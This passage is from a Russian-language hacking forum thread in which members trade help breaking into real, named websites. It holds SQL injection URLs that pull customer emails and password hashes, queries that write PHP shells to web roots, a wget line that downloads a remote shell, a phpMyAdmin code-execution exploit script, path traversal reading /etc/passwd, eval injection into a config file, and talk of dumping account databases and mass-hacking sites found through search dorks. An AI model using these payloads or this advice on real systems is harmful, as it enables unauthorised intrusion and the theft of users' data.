'а'=>'a','б'=>'b','в'=>'v',

'г'=>'g','д'=>'d','е'=>'e',

'ё'=>'e','ж'=>'zh','з'=>'z',

'и'=>'i','й'=>'y','к'=>'k',

'л'=>'l','м'=>'m','н'=>'n',

'о'=>'o','п'=>'p','р'=>'r',

'с'=>'s','т'=>'t','у'=>'u',

'ф'=>'f','х'=>'h','ц'=>'c',

'ч'=>'ch','ш'=>'sh','щ'=>'sch',

'ь'=>'','ы'=>'y','ъ'=>'',

'э'=>'e','ю'=>'yu','я'=>'ya',

"ї"=>"yi","є"=>"ye",



'А'=>'A','Б'=>'B','В'=>'V',

'Г'=>'G','Д'=>'D','Е'=>'E',

'Ё'=>'E','Ж'=>'Zh','З'=>'Z',

'И'=>'I','Й'=>'Y','К'=>'K',

'Л'=>'L','М'=>'M','Н'=>'N',

'О'=>'O','П'=>'P','Р'=>'R',

'С'=>'S','Т'=>'T','У'=>'U',

'Ф'=>'F','Х'=>'H','Ц'=>'C',

'Ч'=>'Ch','Ш'=>'Sh','Щ'=>'Sch',

'Ь'=>'','Ы'=>'Y','Ъ'=>'',

'Э'=>'E','Ю'=>'Yu','Я'=>'Ya',

"Ї"=>"yi","Є"=>"ye",

);

}



$var=trim(strip_tags($var) );

$var=preg_replace("/\s+/ms","-",$var);

$var=strtr($var,$langtranslit);

if ($punkt)$var=preg_replace("/[^a-z0-9\_\-.]+/mi","",$var);

else$var=preg_replace("/[^a-z0-9\_\-]+/mi","",$var);

$var=preg_replace('#[\-]+#i','-',$var);

if ($lower)$var=strtolower($var);

$var=str_ireplace(".php","",$var);

$var=str_ireplace(".php",".ppp",$var);

if(strlen($var) >200) {



$var=substr($var,0,200);



if( ($temp_max=strrpos($var,'-')) )$var=substr($var,0,$temp_max);



}



return$var;

}

Там нет уязвимостей, поскольку функция totranslit всё надёжно вырезает.

ysmat
15.07.2011, 12:09
в моей версии в init.php totranslit не вызываеться

по факту все спец символы проходят

/threadnav52195-8-10.html

проблема только в @is_dir

SergioRezza
15.07.2011, 13:46
есть sql-inj

у меня есть доступ к определённой базе sql, но на сервере есть ещё базы, могу ли я каким-нибудь образом получить к ним доступ? (знаю названия таблиц и колонок)

Expl0ited
15.07.2011, 14:04
Нет.

XAMEHA
15.07.2011, 16:30
ysmat said:
в моей версии в init.php totranslit не вызываеться
по факту все спец символы проходят
/threadnav52195-8-10.html
проблема только в @is_dir


Если конечно данного кода там тоже нет(Поставлен print вместо die):


PHP:
$url=html_entity_decode(urldecode($_SERVER['QUERY_STRING'] ) );

$url=str_replace("\\","/",$url);



if($url) {



if( (strpos($url,'') !==false) || (strpos($url,'"') !==false) || (strpos($url,'./') !==false) || (strpos($url,'../') !==false) ||(strpos($url,'\'') !==false) || (strpos($url,'.php') !==false) ) {

if($_GET['do'] !="search"or$_GET['subaction'] !="search") print("Hacking attempt!");

}



}



$url=html_entity_decode(urldecode($_SERVER['REQUEST_URI'] ) );

$url=str_replace("\\","/",$url);



if($url) {



if( (strpos($url,'') !==false) || (strpos($url,'"') !==false) || (strpos($url,'\'') !==false) ) {

if($_GET['do'] !="search"or$_GET['subaction'] !="search") print("Hacking attempt!");



}



}



И соблюдены пункт 1 или 2, или есть шелл на соседе(Или можно создать произвольный файл тут, или в темпе), то да. Ссылку в ПМ.

d1v
15.07.2011, 17:03
SergioRezza said:
есть sql-inj
у меня есть доступ к определённой базе sql, но на сервере есть ещё базы, могу ли я каким-нибудь образом получить к ним доступ? (знаю названия таблиц и колонок)


унаёшь названия других баз:


Code:
select schema_name from information_schema.schemata

далее в запросах указываешь в какой базе находится таблица:


Code:
select column_name from schema_name.table_name

mailbrush
15.07.2011, 18:04
d1v said:
далее в запросах указываешь в какой базе находится таблица:

Code:
select column_name from schema_name.table_name



WTF???


Code:
select schema_name from information_schema.tables where table_name = 'blablabla'

d1v
15.07.2011, 18:10
mailbrush said:
WTF???

Code:
select schema_name from information_schema.tables where table_name = 'blablabla'





select column_name from schema_name.table_name


я думаю понятно что это не сам запрос, а конструкция. и что здесь не аргументы, а названия.


select schema_name from information_schema.tables where table_name = 'blablabla'


а вот что это такое мне не понятно

mega_667
15.07.2011, 18:37
Ребята, подскажите PLZ .... есть сайт с SQL inject. .... таблицы нашёл ..... поля в нужных таблицах тож нашёл ..... но при попытке вытащить нужную инфу из таблицы вылетает такого рода ошибка - "Table '*******.members' doesn't exist" ..... Как я понял таблица находится в др базе ..... если в запросе укзываю блаблабла from localhost.members , то вылетает такая ошибка - "SELECT command denied to user '*******'@'localhost' for table 'members'" ..... как выйти из положения ? если выход есть ..... заранее спасибо !

[Gold]Shell
15.07.2011, 18:48
Не хватает прав для выполнения запроса.

mailbrush
15.07.2011, 18:54
d1v said:
а вот что это такое мне не понятно


Узнаешь в какой базе находится таблица.

Unknown
15.07.2011, 18:54
Shell"]
[Gold]Shell said:
Не хватает прав для выполнения запроса.


лол что?

1. выполняй "union select database()";

2. потом "union select concat_ws(0x3a,username,password) from REZULTAT_PERVOGO_ZAPROSA.members limit 0,1";

3. Profit!

mega_667
15.07.2011, 19:14
Фараон said:
лол что?
1. выполняй "union select database()";
2. потом "union select concat_ws(0x3a,username,password) from REZULTAT_PERVOGO_ZAPROSA.members limit 0,1";
3. Profit!


database() - результат DB.

Результат одинков .... " Table 'DB.members' doesn't exist " ..

и когда просто members и DB.members .....

Unknown
15.07.2011, 19:19
mega_667 said:
database() - результат DB.
Результат одинков .... " Table 'DB.members' doesn't exist " ..
и когда просто members и DB.members .....


ни, давай ссылягу

mega_667
15.07.2011, 19:22
Фараон said:
ни, давай ссылягу


Всё ребят спасибо .... разобрался с помощью SELECT SCHEMA_NAME FROM INFORMATION_SCHEMA.SCHEMATA нашёл список баз .... последняя покатила .....

Unknown
15.07.2011, 19:23
mega_667 said:
Всё ребят спасибо .... разобрался с помощью SELECT SCHEMA_NAME FROM INFORMATION_SCHEMA.SCHEMATA нашёл список баз .... последняя покатила .....


можно было проще:

SELECT SCHEMA_NAME FROM INFORMATION_SCHEMA.SCHEMATA where table_name='members'

freezed
15.07.2011, 19:47
Фараон said:
можно было проще:
SELECT SCHEMA_NAME FROM INFORMATION_SCHEMA.SCHEMATA where table_name='members'


с каких пор в таблице schemata содержатся названия таблиц?


Code:
select table_schema form information_schema.tables where table_name='name'

d1v
15.07.2011, 23:37
mailbrush said:
Узнаешь в какой базе находится таблица.


это был тонкий намёк на твою ошибку. смотри внимательнее.

Ups
16.07.2011, 13:46
Есть скрипт например:

site.ru/trololo/a.php

Могу выполнять команды через него. Например:

site.ru/trololo/a.php?cmd=ls -la

Выводит лист этой диры.

Так вот. Как залить шелл в диру корневую?

Прав на заливку файла в папку /trololo/ нету.

Expl0ited
16.07.2011, 14:21
Ups said:
Есть скрипт например:
site.ru/trololo/a.php
Могу выполнять команды через него. Например:
site.ru/trololo/a.php?cmd=ls -la
Выводит лист этой диры.
Так вот. Как залить шелл в диру корневую?
Прав на заливку файла в папку /trololo/ нету.




Code:
cd ..;wget -O shell.php http://remote/shell.txt;ls -la

maxfax
16.07.2011, 18:01
Здравствуйте, меня вот интересует такой вопрос, вот к примеру вы нашли sql инъекцию подобрали количество колонок - одним словом можете выполнять произвольные запросы, а что вы дальше делаете залить shell через sql инъекцию это наверное 0.5% из 100 так как не будет прав на это, ну украдете хеш админа и будете клянчить на форуме "расшифруйте пожалуйста мне хеш" или брутить будете его пол года, это все что можно выжать их sql инъекции ?

d1v
16.07.2011, 18:39
maxfax said:
Здравствуйте, меня вот интересует такой вопрос, вот к примеру вы нашли sql инъекцию подобрали количество колонок - одним словом можете выполнять произвольные запросы, а что вы дальше делаете залить shell через sql инъекцию это наверное 0.5% из 100 так как не будет прав на это, ну украдете хеш админа и будете клянчить на форуме "расшифруйте пожалуйста мне хеш" или брутить будете его пол года, это все что можно выжать их sql инъекции ?


можно сдампить базу на стопицот мульонов акков и юзать её.

а насчёт хеша, так в большинстве случаев он удачно брутиться или его вообще нет, т.к. пассы в plaintext.

XAMEHA
16.07.2011, 18:39
maxfax said:
Здравствуйте, меня вот интересует такой вопрос, вот к примеру вы нашли sql инъекцию подобрали количество колонок - одним словом можете выполнять произвольные запросы, а что вы дальше делаете залить shell через sql инъекцию это наверное 0.5% из 100 так как не будет прав на это, ну украдете хеш админа и будете клянчить на форуме "расшифруйте пожалуйста мне хеш" или брутить будете его пол года, это все что можно выжать их sql инъекции ?


1.XSS в SQL-инъекции - В парить админу, получить доступ в админку и залить шелл.

2. Знакомые Хэш-крякеры, платные сервисы взлома хэшей.

3. Если инъекция в UPDATE, INSERT... - Можно подменить данные в СуБДД

4. Поискать другие уязвимости - если их использовать вместе, можно получить наилучший результат.

5. Ну и конечно DoS ещё никто не отменял + с помощью инъекции можно узнать не только логины и хаш, а другие очень полезные данные.

maxfax
16.07.2011, 19:25
Спасибо,за быстрые ответы, с вашего позволения еще один вопрос изложу:

Один раз мне нужно было купить несколько трафистых shell-ов я обратился к одному человеку по рекомендации он мне говорит какой нужен траф и в какой зоне shell-ы нужны, я говорю траф 20к +- 5к зона de, он говорит могу за 5 дней достать shell-ов нулевок на каждом будет трафа 10-15 чел-сутки но вообщем будет траф 20к.

Сделка так и не состоялась по моей вене!

Меня собственно интересует такие вопросы:

1) как люди добывают такое количество shell-лов

2) это супер-пупер гениально умные,космические хакеры

3) может это развод

d1v
16.07.2011, 20:26
maxfax said:
Меня собственно интересует такие вопросы:
1) как люди добывают такое количество shell-лов
2) это супер-пупер гениально умные,космические хакеры
3) может это развод


находится бага (или берётся в паблике) на каком-нибудь популярном (или не популярном) движке, с помощью которой можно залить шелл. далее по доркам парсится выдача гугла на наличие сайтов на данном движке.

plaeer
16.07.2011, 23:47
Ребятки помогите со сплоитом под пхпмуадмин:


*/
//Настройки
//отправляем http-данные
//$method = POST|GET, $url = http://site.com/path, $data = foo1=bar1&foo2=bar2, referer, cookie, useragent
function send_data($method, $url, $data = '', $referer_string = '', $cookie_string = '', $ua_string = '')
{
$return = '';
$feof_count = 0;
$parsed_url = parse_url($url);
$site = $parsed_url['host'];
$path = $parsed_url['path'];
$query = $parsed_url['query'];
($method == 'GET' && !empty($data)) ? $path .= '?'.$data : '';
($method == 'POST' && !empty($query)) ? $path .= '?'.$query : '';
$fp = fsockopen($site, 80, $errno, $errstr, 30);
($method == 'POST') ? $out = "POST $path HTTP/1.1\r\n" : $out = "GET $path HTTP/1.1\r\n";
$out .= "Host: $site\r\n";
$out .= "Content-type: application/x-www-form-urlencoded\r\n";
$out .= "Connection: Close\r\n";
$out .= "User-Agent: $ua_string\r\n";
$out .= "Referer: $referer_string\r\n";
$out .= "Cookie: $cookie_string\r\n";
($method == 'POST') ? $out .= "Content-Length: ".strlen($data)."\r\n\r\n" : $out .= "\r\n";
($method == 'POST') ? fwrite($fp, $out.$data) : fwrite($fp, $out);
while (!feof($fp))
{
if($feof_count >=200)
break;
$return .= fread($fp, 4800);
++$feof_count;
}
fclose($fp);
return $return;
}
$token_page = send_data('GET',$pma_setup_url,'',$pma_setup_url,' ','Opera');
preg_match('@name="token" value="([a-f0-9]{32})"@is',$token_page,$token_array);
$token = $token_array[1];
preg_match_all('@Set-Cookie: ([^\r\n;]+)@is',$token_page,$cookie_array);
$cookie_array = $cookie_array[1];
$cookie_array = implode("; ",$cookie_array);
print send_data('POST',$pma_setup_url,'action=lay_naviga tion&eoltype=unix&token='.$token.'&configuration='.urlencode('a:1:{i:0;O:10:"PMA_Config":1:{s:6:"source";s:'.strlen($ftp_code).':"'.$ftp_code.'";}}'),$pma_setup_url,$cookie_array,'Opera');
?>


А именно вообще не понятна вот эта строка:


//$method = POST|GET, $url = http://site.com/path, $data = foo1=bar1&foo2=bar2, referer, cookie, useragent

Cybersteger
17.07.2011, 00:18
plaeer said:
А именно вообще не понятна вот эта строка:


эта строка закоментирована, она не играет роли сплойт рабочий.

plaeer
17.07.2011, 00:30
Cybersteger said:
эта строка закоментирована, она не играет роли сплойт рабочий.


Закоментиовал, настроил сплоит, получил:

HTTP/1.1 401 Authorization Required Date: Sat, 16 Jul 2011 19:28:19 GMT Server: Apache WWW-Authenticate: Basic realm="phpMyAdmin Setup" Vary: Accept-Encoding Content-Length: 401 Connection: close Content-Type: text/html; charset=iso-8859-1

Authorization Required

This server could not verify that you are authorized to access the document requested. Either you supplied the wrong credentials (e.g., bad password), or your browser doesn't understand how to supply the credentials required.

Дыра закрыта?

попугай
17.07.2011, 03:35
plaeer said:
Закоментиовал, настроил сплоит, получил:
HTTP/1.1 401 Authorization Required Date: Sat, 16 Jul 2011 19:28:19 GMT Server: Apache WWW-Authenticate: Basic realm="phpMyAdmin Setup" Vary: Accept-Encoding Content-Length: 401 Connection: close Content-Type: text/html; charset=iso-8859-1
Authorization Required
This server could not verify that you are authorized to access the document requested. Either you supplied the wrong credentials (e.g., bad password), or your browser doesn't understand how to supply the credentials required.
Дыра закрыта?


просто базовая авторизация стоит на папку пма и/или setup

l.e.a.d.e.r
18.07.2011, 02:28
Подскажите как правильно заливать шелл через sql-inj.


Code:
Warning: mktime() expects parameter 6 to be long, string given in /web/sites/_j/_u/_b/jubilee-centre.org/public/www/apps/documents/classes.php on line 45

поля 6 и 9

_http://www.jubilee-centre.org/document.php?id=16-999.9+union+select+1,2,3,4,5,'',7,8,9+from+informa tion_schema.tables+into+outfile+'/web/sites/_j/_u/_b/jubilee-centre.org/public/www/s.php'--+1--

не знаю как с правами на запись, это какой-то хостинг, нету таблици user, ну ее не выводит точно)

и опять 25, я что-то не так мб делаю?


Code:
http://www.miroboew-kazan.ru/news.php?id=-3+union+select+1,2,3,4,5,6,7--+
http://www.miroboew-kazan.ru/news.php?id=-3+union+select+1,'',3,4,5,6,7+INTO+OUTFILE '/home/virtwww/w_miroboew-kaz-ru_37979ae4/http/1.php'--+

Sc0rpi0n
18.07.2011, 02:54
Помогите плиз обойти WAF

http://www.shungitclub.ru/category_page.php?cat=21&sub=union+select+1,2,+from+mysql.user--

XAMEHA
18.07.2011, 07:56
l.e.a.d.e.r said:
Подскажите как правильно заливать шелл через sql-inj.

Code:
Warning: mktime() expects parameter 6 to be long, string given in /web/sites/_j/_u/_b/jubilee-centre.org/public/www/apps/documents/classes.php on line 45

поля 6 и 9
_http://www.jubilee-centre.org/document.php?id=16-999.9+union+select+1,2,3,4,5,'',7,8,9+from+informa tion_schema.tables+into+outfile+'/web/sites/_j/_u/_b/jubilee-centre.org/public/www/s.php'--+1--
не знаю как с правами на запись, это какой-то хостинг, нету таблици user, ну ее не выводит точно)
и опять 25, я что-то не так мб делаю?

Code:
http://www.miroboew-kazan.ru/news.php?id=-3+union+select+1,2,3,4,5,6,7--+
http://www.miroboew-kazan.ru/news.php?id=-3+union+select+1,'',3,4,5,6,7+INTO+OUTFILE '/home/virtwww/w_miroboew-kaz-ru_37979ae4/http/1.php'--+



1. Для записи шелла можно использовать не выводимые на страницу поля.

2. File_priv у учётной записи всё равно нет.

Sc0rpi0n
18.07.2011, 23:07
запрещены следующие функции php


escapeshellarg,escapeshellcmd,exec,passthru,proc_c lose,proc_get_status,proc_open,proc_nice,proc_term inate,shell_exec,system,ini_restore,popen,dl


Нужно запустить свою прогу (сплоит из под веба). подскажите плиз функции другии которые это могут сделать

попугай
19.07.2011, 00:07
Nightmarе said:
echo `ls -la`;
Можно не благодарить


это алиас shell_exec, а он disabled - так что не прокатит.

Flashmx
19.07.2011, 16:07
Помогите пожалуйста с инъекцией

http://www.easyhandwriting.com/catalog/product_info.php/products_id/12' or 1 group by concat((select customers_email_address from customers limit 0,1),floor(rand(0)*2)) having min(0) or 1 -- 1

Seravin
19.07.2011, 16:18
Flashmx said:
Помогите пожалуйста с инъекцией
http://www.easyhandwriting.com/catalog/product_info.php/products_id/12' or 1 group by concat((select customers_email_address from customers limit 0,1),floor(rand(0)*2)) having min(0) or 1 -- 1


эм... а из каких соображений там инъекция?

Vostok
19.07.2011, 18:43
Подкиньте префиксы от таблиц.

XAMEHA
19.07.2011, 19:34
Vostok said:
Подкиньте префиксы от таблиц.


Стандартные префиксы разные в каждой CMS.

Для DLE - dle_

Joomla - jos_

WordPress - wp_

И т. д.

Flashmx
19.07.2011, 19:39
Seravin said:
эм... а из каких соображений там инъекция?


http://www.easyhandwriting.com/catalog/product_info.php/products_id/12' or 1 group by concat((select customers_email_address from customers limit 0,1),floor(rand(0)*2)) having min(0) or 1 -- 1

1064 - You have an error in your SQL syntax

http://www.easyhandwriting.com/catalog/product_info.php/products_id/12' or 1 group by concat(user(),floor(rand(0)*2)) having min(0) or 1 -- 1

1062 - Duplicate entry 'easyhw@localhost1' for key 1

XAMEHA
19.07.2011, 19:51
Flashmx said:
http://www.easyhandwriting.com/catalog/product_info.php/products_id/12' or 1 group by concat((select customers_email_address from customers limit 0,1),floor(rand(0)*2)) having min(0) or 1 -- 1
1064 - You have an error in your SQL syntax
http://www.easyhandwriting.com/catalog/product_info.php/products_id/12' or 1 group by concat(user(),floor(rand(0)*2)) having min(0) or 1 -- 1
1062 - Duplicate entry 'easyhw@localhost1' for key 1


Третья ветка. Надо читать мануалы


Seravin said:
эм... а из каких соображений там инъекция?


Прокрути страницу вниз

beBoss
20.07.2011, 03:38
Hi guys, I need help for hacking a site. Well first I sorry for that I'm writing on english (i will use and google translator for russian, but not sure if will be understandable). So I'm not good, well let's be honest, I'm noob in this (hacking, sql hacking etc). But after hours of trying I found a vuln (not sure), but I think is vuln.


SQL Error
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%' or description_en like '%77'%' or name like '%77'%') ORDER BY visits,name asc' at line 1


Well is that a vuln ? And If it, can you help me with creating a sql injections ?

Now I will try to translate it to russian, and really sorry about that. i'm from Bulgaria and I should understand your language, but unfortunately I don't. And I think if I write it to bulgarian you wont understand it, so...

Translate from google translator:

Привет, ребята, мне нужна помощь для взлома сайта. Ну сначала я извиняюсь за это я пишу на английском языке (я буду использовать и Google Translator для России, но не уверен, если будет понятно). Так что я не очень хорошо, ну давайте будем честными, я нуб в этом (взлом, взлом SQL и т.д.). но после нескольких часов пытался я нашел vuln (не уверен), но я думаю, vuln.


SQL Error
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%' or description_en like '%77'%' or name like '%77'%') ORDER BY visits,name asc' at line 1


Ну, что vuln? И если это, можете ли вы помочь мне в создании SQL-инъекций?

Теперь я постараюсь перевести его на русский, и действительно сожалею об этом. Я из Болгарии и я понимаю ваш язык, но к сожалению я не делаю. И я думаю, если я напишу его на болгарский вам не понять, так что ...

vaddd
20.07.2011, 03:51
beBoss said:
But after hours of trying I found a vuln (not sure), but I think is vuln.


PM me link - i will try to help you

beBoss
20.07.2011, 05:53
Hey I succeeded. Thanks for your time, and sorry again for that i'm writing in english.

edit: I have a question: how to use "update" in sql and is it possible ?

This is sql injection with select:


Code:
+union+select+1,2,3,4,5,6,7,8,9,10,group_concat(sc hema_name),12 from information_schema.schemata--+-

how to update any table?

Melfis
20.07.2011, 12:42
beBoss said:
Hey I succeeded. Thanks for your time, and sorry again for that i'm writing in english.
edit: I have a question: how to use "update" in sql and is it possible ?
This is sql injection with select:

Code:
+union+select+1,2,3,4,5,6,7,8,9,10,group_concat(sc hema_name),12 from information_schema.schemata--+-

how to update any table?


it's impossible


alexvrn said:
Если тут уязвимости

Code:
http://www.qatcom.com/yellowpages/view/-66854%27
http://www.qatcom.com/listings/search?searchtype=both&what=%3Cscript%3Ealert%28+%27hi!%27%29%3C%2Fscript %3E
http://www.qatcom.com/listings/googlesearch?gwhat=%3Cscript%3Ealert%28+%27hi!%27% 29%3C%2Fscript%3E

Кто хочет помочь с сайтом за $ пишите в личку


http://www.qatcom.com/yellowpages/view/-66854%27 - нету скули

beBoss
20.07.2011, 12:59
Melfis said:
it's impossible


So in my case, I can only read info... Well I can get admins hash passwords, but I can't login with them. Only can login with member and vip acc, but they are simple acc. There is something in mods and admins acc, may be cookie or something that I don;t have and when change my cookies with admin cookies it's logout me.... What can I do ? Is there chance to upload shell or to know what is different with acc, or any way to change someting ? :S

Sloneny
20.07.2011, 15:37
к index.php подключается include('includes/header.php');

строки из header.php


PHP:
" />

[/COLOR]" />[/COLOR]

значения $hc_cfg6 и $hc_cfg5; берутся из таблицы в файле config.php


PHP:
$hc_cfg5="12345";

$hc_cfg6="123";

через админку в файл config.phpудается прописать eval($_GET[e]);

результат


PHP:


но ?e=phpinfo(); выводит пустую страницу.

(если прописать system($_GET['e']); весь сайт накрывается ошибкой

Parse error: syntax error, unexpected T_ENCAPSED_AND_WHITESPACE, expecting T_STRING or T_VARIABLE or T_NUM_STRING in /home/******/public_html/******/******/config.php on line 9

если прописать то в index.php выглядит так


PHP:
" />[/COLOR]

Подскажите пожалуйста где я ошибся? Или что делаю не так?

winstrool
20.07.2011, 16:04
Sloneny said:
к index.php подключается
include('includes/header.php');
строки из
header.php

PHP:
" />

[/COLOR]" />[/COLOR]

значения
$hc_cfg6
и
$hc_cfg5;
берутся из таблицы в файле
config.php

PHP:
$hc_cfg5="12345";

$hc_cfg6="123";

через админку в файл
config.php
удается прописать
eval($_GET[e]);
результат

PHP:


но
?e=phpinfo();
выводит пустую страницу.
(если прописать system($_GET['e']); весь сайт накрывается ошибкой
Parse error: syntax error, unexpected T_ENCAPSED_AND_WHITESPACE, expecting T_STRING or T_VARIABLE or T_NUM_STRING in /home/******/public_html/******/******/config.php on line 9
если прописать то в index.php выглядит так

PHP:
" />[/COLOR]

Подскажите пожалуйста где я ошибся? Или что делаю не так?


ты сначало убедись что пхп работает как надо, пропеши команду


echo "123";


если там где вставил , будет вывод 123, значит робит норм, встовляй тогда где тебе нужно вот этот код:


if (isset($_REQUEST['e'])) eval(stripslashes($_REQUEST['e']));


и вызываешь еко так "?e=phpinfo();"

Redwood
20.07.2011, 16:10
Sloneny

Тебе нужно выйти за кавычки, иначе получается, что переменная $hc_cfg6 имеет тип string и содержит строку eval($_GET[e]); соответственно код выполняться не будет

Вписываешь что то вроде


PHP:
";eval($_GET[e]);"



в итоге получаешь выполнение кода


PHP:
$hc_cfg6="";eval($_GET[e]);"";



?e=phpinfo(); выведет phpinfo

XAMEHA
20.07.2011, 16:21
winstrool said:
ты сначало убедись что пхп работает как надо, пропеши команду
если там где вставил , будет вывод 123, значит робит норм, встовляй тогда где тебе нужно вот этот код:
и вызываешь еко так "?e=phpinfo();"


Если админка фильтрует кавычки, то ты ничто не сделаешь, это банальная XSS. Если же нет, нужно просто выйти за переменную и вставить выполняемый код, как показал h00lyshit!(Если фильтруется двоеточие, то можно вставить код в саму переменную - ".код.").

Но при этом лучше использовать не GET и POST, а куки или HTTP заголовки. Так же возможно, что на стороне сервера запрещено выполнение этих функций.

При этом можно использовать что то типа $a($b) или вставлять нужный код напрямую.

Sloneny
20.07.2011, 17:08
echo "123"; просто в исходном становится

больше нигде не выводит

" превращает в '

$hc_cfg6 = "echo '123';";

$hc_cfg6 = " ';eval($_GET[e]);' ";

видимо придется искать другие пути

Seravin
20.07.2011, 17:28
Sloneny said:
echo "123"; просто в исходном становится

больше нигде не выводит
" превращает в '
$hc_cfg6 = "echo '123';";
$hc_cfg6 = " ';eval($_GET[e]);' ";


считай, что ты можешь вывести значение любой переменной, от этого и пляши. Только вот переменные выводи так:


Code:


а не


Code:

XAMEHA
20.07.2011, 18:02
Seravin said:
а не

Code:




А почему бы и нет? Только одинарные кавычки здесь не к чему.


Code:


И фигурные скобки, и кавычки могут экранироваться

Seravin
20.07.2011, 18:19
XAMEHA said:
А почему бы и нет? Только одинарные кавычки здесь не к чему.

Code:


И фигурные скобки, и кавычки могут экранироваться


ну так круче, инфа проверена

swat_
20.07.2011, 19:27
http://seafightclub.com/index.php?page=../../../../../../../../etc/passwd%00

что можно сделать с этим? =(

в пхп не силён

Konqi
20.07.2011, 19:59
swat_ said:
http://seafightclub.com/index.php?page=../../../../../../../../etc/passwd%00
что можно сделать с этим? =(
в пхп не силён


во первых можно пробовать метод Slesh а, через Webalizer

http://seafightclub.com/index.php?page=../../stats/index.html%00

во вторых там есть форум, пробуй аватарку

в третих там ПМА есть, смотри версию..

а про environ и тп забудь, пхп тут cgi программа

swat_
20.07.2011, 20:08
Konqi said:
во первых можно пробовать метод Slesh а, через Webalizer
http://seafightclub.com/index.php?page=../../stats/index.html%00
во вторых там есть форум, пробуй аватарку
в третих там ПМА есть, смотри версию..
а про environ и тп забудь, пхп тут cgi программа


1 не канает

2 тоже не работает

3 пма не бажный

Konqi
20.07.2011, 20:10
swat_ said:
1 не канает
2 тоже не работает
3 пма не бажный



что значит "не канает" ?

swat_
20.07.2011, 20:14
Konqi said:
что значит "не канает" ?


в смысле не работает


От туда берем ссылку на статистику последнего месяца. А именно имя файла. ЧТото типа такого:usage_200804.html


а тут http://seafightclub.com/usage_201107.html

Not Found

The requested URL /usage_201107.html was not found on this server.

да и домашней папки нет WebAlizer а

Konqi
20.07.2011, 20:17
swat_ said:
в смысле не работает
а тут http://seafightclub.com/usage_201107.html
Not Found
The requested URL /usage_201107.html was not found on this server.
да и домашней папки нет WebAlizer а


http://seafightclub.com/index.php?page=../../stats/usage_201107.html%00

папка /stats/ это и есть домашняя папка вебалайзера =\

swat_
20.07.2011, 20:42
Konqi said:
http://seafightclub.com/index.php?page=../../stats/usage_201107.html%00
папка /stats/ это и есть домашняя папка вебалайзера =\


еще есть какие нибудь варианты?

expupkin
20.07.2011, 21:11
Подскажите каким софтом пользоватся чтобы находить всяческие бэкапы, changelogs, и другие полезные файлы на сайте ?

swat_
20.07.2011, 21:13
expupkin said:
Подскажите каким софтом пользоватся чтобы находить всяческие бэкапы, changelogs, и другие полезные файлы на сайте ?


ArxScanSite

Expl0ited
21.07.2011, 01:31
swat_ said:
еще есть какие нибудь варианты?


Там есть phpmyadmin, и все условия для работы этого сплоита:

http://snipper.ru/view/103/phpmyadmin-33102-3431-session-serializer-arbitrary-php-code-execution-exploit/

Я перепроверил

XAMEHA
21.07.2011, 13:00
Seravin said:
ну так круче, инфа проверена


Ну тогда уж стоит сказать, что можно выполнять код без вставки огораживающих кавычек.


PHP:




Уязвимости такого типа встречаются нередко.

M1ks
21.07.2011, 13:42
http://mail.pnz.ru/face/action.php?action=aff_mail&mail=7&verbose=0&lang=../../face/index это пхп инъекция? если да, то че с ней сделать можно?)

Sc0rpi0n
21.07.2011, 16:22
Есть php инъекция c mq=off, Но там врублен open_basedir.

Можно ли с применением новых техник типа

data:,

php://stdin

- php://stdout

- php://stderr

- php://output

- php://input

и т.п. сделать читалку, чтобы читать исходники а не инклудить

XAMEHA
21.07.2011, 16:25
Sc0rpi0n said:
Есть php инъекция c mq=off, Но там врублен open_basedir.
Можно ли с применением новых техник типа
data:,
php://stdin
- php://stdout
- php://stderr
- php://output
- php://input
и т.п. сделать читалку, чтобы читать исходники а не инклудить


Через php://input выполнить код, который и будет читать файлы. Однако легче будет залить шелл.

/thread232773.html (https://antichat.live/threads/232773/)

Так же не забудь о загрузке аватаров и т. п.

plaeer
22.07.2011, 01:15
Приведите кто-нибудь пример. Каким образом с помощью пхп юзать скули через пост.

Konqi
22.07.2011, 01:22
plaeer said:
Приведите кто-нибудь пример. Каким образом с помощью пхп юзать скули через пост.


/showpost.php?p=2580704&postcount=16410

heks
22.07.2011, 10:08
Вот к примеру скуль

http://www.riviera-crimea.com/detail.php?id=425

Как пошагово ее раскрутить до такого вида раскручивать ручками

http://www.riviera-crimea.com/detail.php?id=-425'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,co ncat_ws(0x3a,user(),version(),database()),15,16+--+

Вопрос еще такой почему если мы убираем или ковычку или знак минуса то скуль невыводит результат. От чего это зависит?

d1v
22.07.2011, 10:18
heks said:
Вот к примеру скуль
http://www.riviera-crimea.com/detail.php?id=425
Как пошагово ее раскрутить до такого вида раскручивать ручками
http://www.riviera-crimea.com/detail.php?id=-425'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,co ncat_ws(0x3a,user(),version(),database()),15,16+--+
Вопрос еще такой почему если мы убираем или ковычку или знак минуса то скуль невыводит результат. От чего это зависит?


а я думал ты хакир %)

/thread217895-sql+faq.html

heks
22.07.2011, 10:27
Мне бы расписать почему при

http://www.riviera-crimea.com/detail.php?id=-425'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,co ncat_ws(0x3a,user(),version(),database()),15,16+--+ данные выводятся

http://www.riviera-crimea.com/detail.php?id=425+union+select+1,2,3,4,5,6,7,8,9,1 0,11,12,13,co ncat_ws(0x3a,user(),version(),database()),15,16+--+ (убираем минусили ковычку)данные не выводятся

как узнать когда писать именно ковычку, минус и ковычку а когда просто ковычку

contreil
22.07.2011, 10:28
Всем привет! А как узнать у определенного сайта на каком фаерволе он сидит?

heks
22.07.2011, 10:30
contreil said:
Всем привет! А как узнать у определенного сайта на каком фаерволе он сидит?


Идиотский вопрос такой)))) Спроси кто сервер админит.

d1v
22.07.2011, 10:52
contreil said:
Всем привет! А как узнать у определенного сайта на каком фаерволе он сидит?


если ты имеешь ввиду WAF, то смотреть коды возвращаемых ошибок, куки; либо задетектить стандартные правила, характерные для конкретного WAF'a. Если же ты говоришь о том, что непосредственно защищает сам сервер, то порутать его и посмотреть что на нём запущенно.


тогда как количество солбцов подобрать
с помощью order by


статью прочитать.

contreil
22.07.2011, 11:08
heks said:
Идиотский вопрос такой)))) Спроси кто сервер админит.


И на этом спасибо!

ZARO
22.07.2011, 11:08
heks said:
Мне бы расписать почему при
http://www.riviera-crimea.com/detail.php?id=-425'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,co ncat_ws(0x3a,user(),version(),database()),15,16+--+
данные выводятся
